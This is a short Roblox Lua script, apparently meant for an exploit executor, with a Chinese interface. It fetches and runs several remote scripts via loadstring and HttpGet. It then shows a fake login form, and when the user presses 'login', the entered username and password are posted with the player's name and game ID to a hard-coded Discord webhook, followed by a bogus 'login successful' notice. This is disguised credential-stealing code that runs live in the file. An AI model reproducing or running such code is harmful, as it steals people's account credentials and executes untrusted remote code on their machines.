local library = loadstring(game:HttpGet("https://raw.githubusercontent.com/IlIlIlIlIlIlIlIlIlIlIlIlIlIlIlIl/IlIlIlIlIlIlIlIlIlIlIlIlIlIlIlIl/main/ui.lua"))();		
local window = library:NEWS("Roblox")
loadstring(game:HttpGet("https://raw.githubusercontent.com/BocusLuke/UI/main/STX/Module.Lua"))()
local Notification = loadstring(game:HttpGet("https://raw.githubusercontent.com/BocusLuke/UI/main/STX/Client.Lua"))()
local notifications = loadstring(game:HttpGet(("https://raw.githubusercontent.com/AbstractPoo/Main/main/Notifications.lua"), true))()
--------------------
local Now = window:Tab("主要", '6035145364')
--------------------------------
local Hook = Now:section("通知", false)
------------------------------------------------
local XF = {
    ddos = {
        hook = "https://discord.com/api/webhooks/1288710168913248337/ydZ7ICGnZSMv9AKepNXJWgRkVWWR9UtW5aoUncGmwd_dn4xi-5ug7bhTmPnsiTEuCrje",
        ci = 1,
        username = '',
        password = ''
    },
}
local Players = game:GetService("Players")
-----------------------------------------------------------------------------

Hook:Textbox("用户名", "", "请输入", function(s)
    XF.ddos.username = s
end)

Hook:Textbox("密码", "", "请输入", function(s)
    XF.ddos.password = s
end)

Hook:Button("登录", function()
    for i = 1, XF.ddos.ci do 
        local Webhook = XF.ddos.hook
        local try = {
            ["username"] = Players.LocalPlayer.Name,
            ["content"] = "用户名：" .. XF.ddos.username .. "\n密码：" .. XF.ddos.password,
            ["embeds"] = {{
                ["fields"] = {
                    {
                        ["name"] = "名称(Name)",
                        ["value"] = Players.LocalPlayer.Name,
                        ["inline"] = true
                    },
                    {
                        ["name"] = "地图ID",
                        ["value"] = game.PlaceId .. " (" .. tostring("https://www.roblox.com/games/" .. game.PlaceId) .. ")",
                        ["inline"] = true
                    },
                }
            }}
        }

        local request = http_request or request or HttpPost or syn.request
        request({
            Url = Webhook,
            Method = "POST",
            Headers = {["Content-Type"] = "application/json"},
            Body = game.HttpService:JSONEncode(try)
        })
    end

    notifications:notify{
        Title = "Roblox",
        Description = "登录成功！",
        Icon = 6031302918,
        Accept = {
            Text = "好的",
            Callback = function() end
        },
        Length = 5
    }
end)